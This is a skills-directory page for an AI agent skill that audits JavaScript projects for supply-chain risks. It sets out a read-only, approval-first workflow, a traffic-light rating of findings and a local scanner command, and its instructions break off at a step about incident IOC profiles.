Skills

package-security-check

Installation
SKILL.md

Package Security Check

Workflow

  1. Treat this as a base JS supply-chain check first. Do not force the result around one CVE, vendor, package family, or incident.
  2. Before running installs, package-manager mutation commands, or file edits, perform only read-only inspection and present a traffic-light issue analysis:
    • 🔴 Blocker: compromise signal, unsafe install path, secret exposure, or policy that allows unreviewed code execution.
    • 🟡 Risk: hardening gap, stale package-manager major, broad spec, lifecycle script needing review, or CI weakness.
    • 🟢 OK: verified control or no finding.
  3. After the traffic-light analysis, ask for approval before changing files or executing package-manager operations that can install, update, publish, or rewrite lockfiles.
  4. From this skill directory, run the baseline scanner against the repo or workspace root:
python3 scripts/check_js_supply_chain.py --root <repo-or-workspace-root>

Use --strict when the check should fail on hardening gaps. Use --json when another tool needs machine-readable output. Use --include-installed only when node_modules exists and installed package lifecycle metadata matters.

  1. For a specific active incident, add one or more IOC profiles:
Installs
13
Repository
instructa/agent-skills
GitHub Stars
100
First Seen
3 days ago
Security Audits
Gen Agent Trust HubPass
SocketPass
SnykPass